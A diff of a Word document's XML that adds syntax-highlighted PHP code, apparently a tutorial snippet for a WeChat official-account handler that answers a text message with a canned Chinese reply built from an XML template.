                 <w:kern w:val="0"/>
                 <w:sz w:val="22"/>
               </w:rPr>
-              <w:t>$</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:color w:val="55AA55"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>postXml</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>$postXml</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
@@ -19097,11 +16968,6 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:t>将</w:t>
             </w:r>
@@ -19140,12 +17006,1274 @@
           </w:p>
           <w:p>
             <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
-            <w:bookmarkStart w:id="2" w:name="_GoBack"/>
-            <w:bookmarkEnd w:id="2"/>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="295F94"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">if </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="BC5A65"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>strtolower</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>$postObj</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>-&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="566874"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>MsgType</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>==</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>'text'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>)){</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>//</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>是纯文本消息</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="295F94"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">if </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>$postObj</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>-</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="566874"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>Content</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>==</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>"</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>虎哥好帅</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>"</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>){</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>$toUser</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>=</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>$postObj</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>-&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="566874"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>FromUserName</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>$fromUser</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>=</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>$postObj</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>-&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="566874"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>ToUserName</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>$time</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>=</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="BC5A65"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>time</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>$msgType</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>=</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>"text"</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>$content</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>=</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>"</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>多谢夸奖，哈哈哈！</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>"</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>$template</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>=</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>"&lt;xml&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>&lt;ToUserName&gt;&lt;![CDATA[%s]]&gt;&lt;/ToUserName&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>&lt;FromUserName&gt;&lt;![CDATA[%s]]&gt;&lt;/FromUserName&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
